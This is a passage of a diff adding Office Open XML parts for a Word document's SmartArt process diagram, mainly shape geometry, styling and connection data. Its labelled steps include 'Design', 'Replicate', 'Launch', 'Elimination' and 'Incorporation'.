+    <dgm:cxn modelId="{155E720C-CFEF-46FC-A8E0-A5E44F2038E6}" type="presOf" srcId="{B170CED5-068A-4D1F-8945-28B6D2132492}" destId="{61C3E4CA-7425-476B-AD9D-D5AB86098096}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{ABBD9078-3C10-4A0F-AE86-317D8F944406}" type="presOf" srcId="{DB6C199B-2444-4A39-89D8-D62BE1923D5A}" destId="{541895FD-52F7-4D93-8303-FC10E12608E1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{560E1A79-69E7-46A4-917F-04B69B7939ED}" type="presOf" srcId="{32681F8D-9D8E-4727-8479-EA7057C17516}" destId="{220F6836-5000-4BC1-8FE8-9539F8D4CCDC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{C6E37EC1-61EE-496D-BAA9-ED77DC645BBC}" type="presOf" srcId="{0F52D196-7939-437B-91DB-B98A69237BEA}" destId="{50C454E7-BA89-4F9E-91A0-7821EAC680BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{3D436795-96AF-4D22-A50D-C3B802A1378F}" type="presParOf" srcId="{289C4758-43B3-45D3-9BD4-1253118A7416}" destId="{DA789D76-2ED8-45A2-981D-3BD7CFC38014}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{25D0DDC4-E6B3-4A48-A10F-015DF475BC81}" type="presParOf" srcId="{289C4758-43B3-45D3-9BD4-1253118A7416}" destId="{220F6836-5000-4BC1-8FE8-9539F8D4CCDC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{6007513C-2169-47B9-89BA-5239F7B066B5}" type="presParOf" srcId="{289C4758-43B3-45D3-9BD4-1253118A7416}" destId="{9AEC3832-438D-4221-B6E6-1F413B84BB9D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{19B34364-9415-4BDF-87E3-97E7D3D94A01}" type="presParOf" srcId="{9AEC3832-438D-4221-B6E6-1F413B84BB9D}" destId="{BCB2D286-31D5-48BB-BE52-B614B11118CB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{F5DD6DC2-AE04-4FDF-A85A-B70D65647375}" type="presParOf" srcId="{9AEC3832-438D-4221-B6E6-1F413B84BB9D}" destId="{541895FD-52F7-4D93-8303-FC10E12608E1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{D61C75E6-BB1A-4B3A-BE68-5BD986DA01CC}" type="presParOf" srcId="{289C4758-43B3-45D3-9BD4-1253118A7416}" destId="{66F318BB-222F-4159-A34F-C52A62A28F62}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{CB8F44A9-78D4-4E03-934B-D0C8BDEF0EF1}" type="presParOf" srcId="{289C4758-43B3-45D3-9BD4-1253118A7416}" destId="{FB7E4BC7-26C6-4F90-BB14-059544BB36D5}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{989BE0F8-5D3B-4C63-B88F-30298EC5BCEE}" type="presParOf" srcId="{FB7E4BC7-26C6-4F90-BB14-059544BB36D5}" destId="{BC00D9AE-F964-4CFF-A842-A82AB27A6F8B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{7E1D40DD-694E-425C-9F6A-2242FA822185}" type="presParOf" srcId="{FB7E4BC7-26C6-4F90-BB14-059544BB36D5}" destId="{50C454E7-BA89-4F9E-91A0-7821EAC680BD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{AD296964-C4C7-43B5-AF7A-42E8CA7EE9C5}" type="presParOf" srcId="{289C4758-43B3-45D3-9BD4-1253118A7416}" destId="{A120EEDA-63B5-4BF5-B2C4-813ACBA210CA}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{D0514DC7-0A36-4AE9-9E4D-A167B4761E9B}" type="presParOf" srcId="{289C4758-43B3-45D3-9BD4-1253118A7416}" destId="{4FDC543E-C148-4881-AD9F-47C07A971BBA}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{24E783BD-A977-4A99-8BB5-D2BC772597E0}" type="presParOf" srcId="{4FDC543E-C148-4881-AD9F-47C07A971BBA}" destId="{41522627-5F3E-4344-9647-BB447D6B2372}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{CFBF4DD4-3AAC-44A0-A02D-93FA074BD255}" type="presParOf" srcId="{4FDC543E-C148-4881-AD9F-47C07A971BBA}" destId="{3DD4A119-987F-4511-B596-34C99B57CEAD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{2D229341-9A5E-44E1-B53E-05C5CFB83D10}" type="presParOf" srcId="{289C4758-43B3-45D3-9BD4-1253118A7416}" destId="{FB9DD9DF-E856-4125-B7F2-5FFADD10B34B}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{92049B19-2587-462C-8607-E5D6481C4ACE}" type="presParOf" srcId="{289C4758-43B3-45D3-9BD4-1253118A7416}" destId="{50CF3BBF-AEA7-45B5-9AEB-E6312F6A7282}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{EDA2744E-A933-4586-892A-583307FB1537}" type="presParOf" srcId="{50CF3BBF-AEA7-45B5-9AEB-E6312F6A7282}" destId="{50FD5A12-340B-4260-99AB-E52AFDDE90EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{878220CC-EC26-4DBD-9B19-3D74E08A8E56}" type="presParOf" srcId="{50CF3BBF-AEA7-45B5-9AEB-E6312F6A7282}" destId="{727D758E-B907-4E65-BC04-2F667812EB65}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{70820D70-46A1-4C24-8FCC-BBFB09079442}" type="presParOf" srcId="{289C4758-43B3-45D3-9BD4-1253118A7416}" destId="{5922692C-701D-4F11-A7C8-902588B2087C}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{ED7E950F-C6CC-4C57-B7DC-D12CDAFECCD2}" type="presParOf" srcId="{289C4758-43B3-45D3-9BD4-1253118A7416}" destId="{61C3E4CA-7425-476B-AD9D-D5AB86098096}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+  </dgm:cxnLst>
+  <dgm:bg/>
+  <dgm:whole/>
+  <dgm:extLst>
+    <a:ext uri="http://schemas.microsoft.com/office/drawing/2008/diagram">
+      <dsp:dataModelExt xmlns:dsp="http://schemas.microsoft.com/office/drawing/2008/diagram" relId="rId127" minVer="http://schemas.openxmlformats.org/drawingml/2006/diagram"/>
+    </a:ext>
+  </dgm:extLst>
+</dgm:dataModel>
+</file>
+
+<file path=word/diagrams/drawing1.xml><?xml version="1.0" encoding="utf-8"?>
+<dsp:drawing xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:dsp="http://schemas.microsoft.com/office/drawing/2008/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+  <dsp:spTree>
+    <dsp:nvGrpSpPr>
+      <dsp:cNvPr id="0" name=""/>
+      <dsp:cNvGrpSpPr/>
+    </dsp:nvGrpSpPr>
+    <dsp:grpSpPr/>
+    <dsp:sp modelId="{DA789D76-2ED8-45A2-981D-3BD7CFC38014}">
+      <dsp:nvSpPr>
+        <dsp:cNvPr id="0" name=""/>
+        <dsp:cNvSpPr/>
+      </dsp:nvSpPr>
+      <dsp:spPr>
+        <a:xfrm>
+          <a:off x="222670" y="275857"/>
+          <a:ext cx="1024666" cy="1027035"/>
+        </a:xfrm>
+        <a:prstGeom prst="ellipse">
+          <a:avLst/>
+        </a:prstGeom>
+        <a:solidFill>
+          <a:schemeClr val="accent1">
+            <a:hueOff val="0"/>
+            <a:satOff val="0"/>
+            <a:lumOff val="0"/>
+            <a:alphaOff val="0"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="lt1">
+              <a:hueOff val="0"/>
+              <a:satOff val="0"/>
+              <a:lumOff val="0"/>
+              <a:alphaOff val="0"/>
+            </a:schemeClr>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:effectLst/>
+      </dsp:spPr>
+      <dsp:style>
+        <a:lnRef idx="2">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:lnRef>
+        <a:fillRef idx="1">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:fillRef>
+        <a:effectRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="lt1"/>
+        </a:fontRef>
+      </dsp:style>
+      <dsp:txBody>
+        <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="19050" tIns="19050" rIns="19050" bIns="19050" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
+          <a:noAutofit/>
+        </a:bodyPr>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr lvl="0" algn="ctr" defTabSz="666750">
+            <a:lnSpc>
+              <a:spcPct val="90000"/>
+            </a:lnSpc>
+            <a:spcBef>
+              <a:spcPct val="0"/>
+            </a:spcBef>
+            <a:spcAft>
+              <a:spcPct val="35000"/>
+            </a:spcAft>
+          </a:pPr>
+          <a:r>
+            <a:rPr lang="en-US" sz="1500" kern="1200"/>
+            <a:t>Design</a:t>
+          </a:r>
+        </a:p>
+      </dsp:txBody>
+      <dsp:txXfrm>
+        <a:off x="372729" y="426263"/>
+        <a:ext cx="724548" cy="726223"/>
+      </dsp:txXfrm>
+    </dsp:sp>
+    <dsp:sp modelId="{220F6836-5000-4BC1-8FE8-9539F8D4CCDC}">
+      <dsp:nvSpPr>
+        <dsp:cNvPr id="0" name=""/>
+        <dsp:cNvSpPr/>
+      </dsp:nvSpPr>
+      <dsp:spPr>
+        <a:xfrm rot="10802674">
+          <a:off x="502827" y="1418687"/>
+          <a:ext cx="463182" cy="245487"/>
+        </a:xfrm>
+        <a:prstGeom prst="triangle">
+          <a:avLst/>
+        </a:prstGeom>
+        <a:solidFill>
+          <a:schemeClr val="accent1">
+            <a:tint val="60000"/>
+            <a:hueOff val="0"/>
+            <a:satOff val="0"/>
+            <a:lumOff val="0"/>
+            <a:alphaOff val="0"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </dsp:spPr>
+      <dsp:style>
+        <a:lnRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:lnRef>
+        <a:fillRef idx="1">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:fillRef>
+        <a:effectRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="lt1"/>
+        </a:fontRef>
+      </dsp:style>
+    </dsp:sp>
+    <dsp:sp modelId="{541895FD-52F7-4D93-8303-FC10E12608E1}">
+      <dsp:nvSpPr>
+        <dsp:cNvPr id="0" name=""/>
+        <dsp:cNvSpPr/>
+      </dsp:nvSpPr>
+      <dsp:spPr>
+        <a:xfrm>
+          <a:off x="0" y="1766075"/>
+          <a:ext cx="1467408" cy="1389095"/>
+        </a:xfrm>
+        <a:prstGeom prst="ellipse">
+          <a:avLst/>
+        </a:prstGeom>
+        <a:solidFill>
+          <a:schemeClr val="accent1">
+            <a:hueOff val="0"/>
+            <a:satOff val="0"/>
+            <a:lumOff val="0"/>
+            <a:alphaOff val="0"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="lt1">
+              <a:hueOff val="0"/>
+              <a:satOff val="0"/>
+              <a:lumOff val="0"/>
+              <a:alphaOff val="0"/>
+            </a:schemeClr>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:effectLst/>
+      </dsp:spPr>
+      <dsp:style>
+        <a:lnRef idx="2">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:lnRef>
+        <a:fillRef idx="1">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:fillRef>
+        <a:effectRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="lt1"/>
+        </a:fontRef>
+      </dsp:style>
+      <dsp:txBody>
+        <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="17780" tIns="17780" rIns="17780" bIns="17780" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
+          <a:noAutofit/>
+        </a:bodyPr>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
+            <a:lnSpc>
+              <a:spcPct val="90000"/>
+            </a:lnSpc>
+            <a:spcBef>
+              <a:spcPct val="0"/>
+            </a:spcBef>
+            <a:spcAft>
+              <a:spcPct val="35000"/>
+            </a:spcAft>
+          </a:pPr>
+          <a:r>
+            <a:rPr lang="en-US" sz="1400" kern="1200"/>
+            <a:t>Replicate</a:t>
+          </a:r>
+        </a:p>
+      </dsp:txBody>
+      <dsp:txXfrm>
+        <a:off x="214897" y="1969503"/>
+        <a:ext cx="1037614" cy="982239"/>
+      </dsp:txXfrm>
+    </dsp:sp>
+    <dsp:sp modelId="{66F318BB-222F-4159-A34F-C52A62A28F62}">
+      <dsp:nvSpPr>
+        <dsp:cNvPr id="0" name=""/>
+        <dsp:cNvSpPr/>
+      </dsp:nvSpPr>
+      <dsp:spPr>
+        <a:xfrm rot="5454263">
+          <a:off x="1695969" y="2356725"/>
+          <a:ext cx="463182" cy="245487"/>
+        </a:xfrm>
+        <a:prstGeom prst="triangle">
+          <a:avLst/>
+        </a:prstGeom>
+        <a:solidFill>
+          <a:schemeClr val="accent1">
+            <a:tint val="60000"/>
+            <a:hueOff val="0"/>
+            <a:satOff val="0"/>
+            <a:lumOff val="0"/>
+            <a:alphaOff val="0"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </dsp:spPr>
+      <dsp:style>
+        <a:lnRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:lnRef>
+        <a:fillRef idx="1">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:fillRef>
+        <a:effectRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="lt1"/>
+        </a:fontRef>
+      </dsp:style>
+    </dsp:sp>
+    <dsp:sp modelId="{50C454E7-BA89-4F9E-91A0-7821EAC680BD}">
+      <dsp:nvSpPr>
+        <dsp:cNvPr id="0" name=""/>
+        <dsp:cNvSpPr/>
+      </dsp:nvSpPr>
+      <dsp:spPr>
+        <a:xfrm>
+          <a:off x="2373867" y="2052134"/>
+          <a:ext cx="882694" cy="882694"/>
+        </a:xfrm>
+        <a:prstGeom prst="ellipse">
+          <a:avLst/>
+        </a:prstGeom>
+        <a:solidFill>
+          <a:schemeClr val="accent1">
+            <a:hueOff val="0"/>
+            <a:satOff val="0"/>
+            <a:lumOff val="0"/>
+            <a:alphaOff val="0"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="lt1">
+              <a:hueOff val="0"/>
+              <a:satOff val="0"/>
+              <a:lumOff val="0"/>
+              <a:alphaOff val="0"/>
+            </a:schemeClr>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:effectLst/>
+      </dsp:spPr>
+      <dsp:style>
+        <a:lnRef idx="2">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:lnRef>
+        <a:fillRef idx="1">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:fillRef>
+        <a:effectRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="lt1"/>
+        </a:fontRef>
+      </dsp:style>
+      <dsp:txBody>
+        <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="13970" tIns="13970" rIns="13970" bIns="13970" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
+          <a:noAutofit/>
+        </a:bodyPr>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr lvl="0" algn="ctr" defTabSz="466725">
+            <a:lnSpc>
+              <a:spcPct val="90000"/>
+            </a:lnSpc>
+            <a:spcBef>
+              <a:spcPct val="0"/>
+            </a:spcBef>
+            <a:spcAft>
+              <a:spcPct val="35000"/>
+            </a:spcAft>
+          </a:pPr>
+          <a:r>
+            <a:rPr lang="en-US" sz="1050" kern="1200"/>
+            <a:t>Launch</a:t>
+          </a:r>
+        </a:p>
+      </dsp:txBody>
+      <dsp:txXfrm>
+        <a:off x="2503135" y="2181402"/>
+        <a:ext cx="624158" cy="624158"/>
+      </dsp:txXfrm>
+    </dsp:sp>
+    <dsp:sp modelId="{A120EEDA-63B5-4BF5-B2C4-813ACBA210CA}">
+      <dsp:nvSpPr>
+        <dsp:cNvPr id="0" name=""/>
+        <dsp:cNvSpPr/>
+      </dsp:nvSpPr>
+      <dsp:spPr>
+        <a:xfrm>
+          <a:off x="2583622" y="1561035"/>
+          <a:ext cx="463182" cy="245487"/>
+        </a:xfrm>
+        <a:prstGeom prst="triangle">
+          <a:avLst/>
+        </a:prstGeom>
+        <a:solidFill>
+          <a:schemeClr val="accent1">
+            <a:tint val="60000"/>
+            <a:hueOff val="0"/>
+            <a:satOff val="0"/>
+            <a:lumOff val="0"/>
+            <a:alphaOff val="0"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </dsp:spPr>
+      <dsp:style>
+        <a:lnRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:lnRef>
+        <a:fillRef idx="1">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:fillRef>
+        <a:effectRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="lt1"/>
+        </a:fontRef>
+      </dsp:style>
+    </dsp:sp>
+    <dsp:sp modelId="{3DD4A119-987F-4511-B596-34C99B57CEAD}">
+      <dsp:nvSpPr>
+        <dsp:cNvPr id="0" name=""/>
+        <dsp:cNvSpPr/>
+      </dsp:nvSpPr>
+      <dsp:spPr>
+        <a:xfrm>
+          <a:off x="2130398" y="84517"/>
+          <a:ext cx="1369632" cy="1244801"/>
+        </a:xfrm>
+        <a:prstGeom prst="ellipse">
+          <a:avLst/>
+        </a:prstGeom>
+        <a:solidFill>
+          <a:schemeClr val="accent1">
+            <a:hueOff val="0"/>
+            <a:satOff val="0"/>
+            <a:lumOff val="0"/>
+            <a:alphaOff val="0"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="lt1">
+              <a:hueOff val="0"/>
+              <a:satOff val="0"/>
+              <a:lumOff val="0"/>
+              <a:alphaOff val="0"/>
+            </a:schemeClr>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:effectLst/>
+      </dsp:spPr>
+      <dsp:style>
+        <a:lnRef idx="2">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:lnRef>
+        <a:fillRef idx="1">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:fillRef>
+        <a:effectRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="lt1"/>
+        </a:fontRef>
+      </dsp:style>
+      <dsp:txBody>
+        <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="17780" tIns="17780" rIns="17780" bIns="17780" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
+          <a:noAutofit/>
+        </a:bodyPr>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
+            <a:lnSpc>
+              <a:spcPct val="90000"/>
+            </a:lnSpc>
+            <a:spcBef>
+              <a:spcPct val="0"/>
+            </a:spcBef>
+            <a:spcAft>
+              <a:spcPct val="35000"/>
+            </a:spcAft>
+          </a:pPr>
+          <a:r>
+            <a:rPr lang="en-US" sz="1400" kern="1200"/>
+            <a:t>Elimination</a:t>
+          </a:r>
+        </a:p>
+      </dsp:txBody>
+      <dsp:txXfrm>
+        <a:off x="2330976" y="266814"/>
+        <a:ext cx="968476" cy="880207"/>
+      </dsp:txXfrm>
+    </dsp:sp>
+    <dsp:sp modelId="{FB9DD9DF-E856-4125-B7F2-5FFADD10B34B}">
+      <dsp:nvSpPr>
+        <dsp:cNvPr id="0" name=""/>
+        <dsp:cNvSpPr/>
+      </dsp:nvSpPr>
+      <dsp:spPr>
+        <a:xfrm rot="5400000">
+          <a:off x="3625633" y="584175"/>
+          <a:ext cx="463182" cy="245487"/>
+        </a:xfrm>
+        <a:prstGeom prst="triangle">
+          <a:avLst/>
+        </a:prstGeom>
+        <a:solidFill>
+          <a:schemeClr val="accent1">
+            <a:tint val="60000"/>
+            <a:hueOff val="0"/>
+            <a:satOff val="0"/>
+            <a:lumOff val="0"/>
+            <a:alphaOff val="0"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </dsp:spPr>
+      <dsp:style>
+        <a:lnRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:lnRef>
+        <a:fillRef idx="1">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:fillRef>
+        <a:effectRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="lt1"/>
+        </a:fontRef>
+      </dsp:style>
+    </dsp:sp>
+    <dsp:sp modelId="{727D758E-B907-4E65-BC04-2F667812EB65}">
+      <dsp:nvSpPr>
+        <dsp:cNvPr id="0" name=""/>
+        <dsp:cNvSpPr/>
+      </dsp:nvSpPr>
+      <dsp:spPr>
+        <a:xfrm>
+          <a:off x="4200523" y="104775"/>
+          <a:ext cx="1245772" cy="1204286"/>
+        </a:xfrm>
+        <a:prstGeom prst="ellipse">
+          <a:avLst/>
+        </a:prstGeom>
+        <a:solidFill>
+          <a:schemeClr val="accent1">
+            <a:hueOff val="0"/>
+            <a:satOff val="0"/>
+            <a:lumOff val="0"/>
+            <a:alphaOff val="0"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="lt1">
+              <a:hueOff val="0"/>
+              <a:satOff val="0"/>
+              <a:lumOff val="0"/>
+              <a:alphaOff val="0"/>
+            </a:schemeClr>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:effectLst/>
+      </dsp:spPr>
+      <dsp:style>
+        <a:lnRef idx="2">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:lnRef>
+        <a:fillRef idx="1">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:fillRef>
+        <a:effectRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="lt1"/>
+        </a:fontRef>
+      </dsp:style>
+      <dsp:txBody>
+        <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="15240" tIns="15240" rIns="15240" bIns="15240" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
+          <a:noAutofit/>
+        </a:bodyPr>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr lvl="0" algn="ctr" defTabSz="533400">
+            <a:lnSpc>
+              <a:spcPct val="90000"/>
+            </a:lnSpc>
+            <a:spcBef>
+              <a:spcPct val="0"/>
+            </a:spcBef>
+            <a:spcAft>
+              <a:spcPct val="35000"/>
+            </a:spcAft>
+          </a:pPr>
+          <a:r>
+            <a:rPr lang="en-US" sz="1200" kern="1200"/>
+            <a:t>Incorporation</a:t>
+          </a:r>
+        </a:p>
+      </dsp:txBody>
+      <dsp:txXfrm>
+        <a:off x="4382962" y="281139"/>
+        <a:ext cx="880894" cy="851558"/>
+      </dsp:txXfrm>
+    </dsp:sp>
+    <dsp:sp modelId="{5922692C-701D-4F11-A7C8-902588B2087C}">
+      <dsp:nvSpPr>
+        <dsp:cNvPr id="0" name=""/>
+        <dsp:cNvSpPr/>
+      </dsp:nvSpPr>
+      <dsp:spPr>
+        <a:xfrm rot="10800000">
+          <a:off x="4591818" y="1454630"/>
+          <a:ext cx="463182" cy="245487"/>
+        </a:xfrm>
+        <a:prstGeom prst="triangle">
+          <a:avLst/>
+        </a:prstGeom>
+        <a:solidFill>
+          <a:schemeClr val="accent1">
+            <a:tint val="60000"/>
+            <a:hueOff val="0"/>
+            <a:satOff val="0"/>
+            <a:lumOff val="0"/>
+            <a:alphaOff val="0"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </dsp:spPr>
+      <dsp:style>
+        <a:lnRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:lnRef>
+        <a:fillRef idx="1">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:fillRef>
+        <a:effectRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="lt1"/>
+        </a:fontRef>
+      </dsp:style>
+    </dsp:sp>
+    <dsp:sp modelId="{61C3E4CA-7425-476B-AD9D-D5AB86098096}">
+      <dsp:nvSpPr>
+        <dsp:cNvPr id="0" name=""/>
+        <dsp:cNvSpPr/>
+      </dsp:nvSpPr>
+      <dsp:spPr>
+        <a:xfrm>
+          <a:off x="4229100" y="1831791"/>
+          <a:ext cx="1188619" cy="1157904"/>
+        </a:xfrm>
+        <a:prstGeom prst="ellipse">
+          <a:avLst/>
+        </a:prstGeom>
+        <a:solidFill>
+          <a:schemeClr val="accent1">
+            <a:hueOff val="0"/>
+            <a:satOff val="0"/>
+            <a:lumOff val="0"/>
+            <a:alphaOff val="0"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="lt1">
+              <a:hueOff val="0"/>
+              <a:satOff val="0"/>
+              <a:lumOff val="0"/>
+              <a:alphaOff val="0"/>
+            </a:schemeClr>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:effectLst/>
+      </dsp:spPr>
+      <dsp:style>
+        <a:lnRef idx="2">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:lnRef>
+        <a:fillRef idx="1">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:fillRef>
+        <a:effectRef idx="0">
+          <a:scrgbClr r="0" g="0" b="0"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="lt1"/>
+        </a:fontRef>
+      </dsp:style>
+      <dsp:txBody>
+        <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="19050" tIns="19050" rIns="19050" bIns="19050" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
+          <a:noAutofit/>
+        </a:bodyPr>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr lvl="0" algn="ctr" defTabSz="666750">
+            <a:lnSpc>
+              <a:spcPct val="90000"/>
+            </a:lnSpc>
+            <a:spcBef>
+              <a:spcPct val="0"/>
+            </a:spcBef>
+            <a:spcAft>
+              <a:spcPct val="35000"/>
+            </a:spcAft>
+          </a:pPr>
+          <a:r>
+            <a:rPr lang="en-US" sz="1500" kern="1200"/>
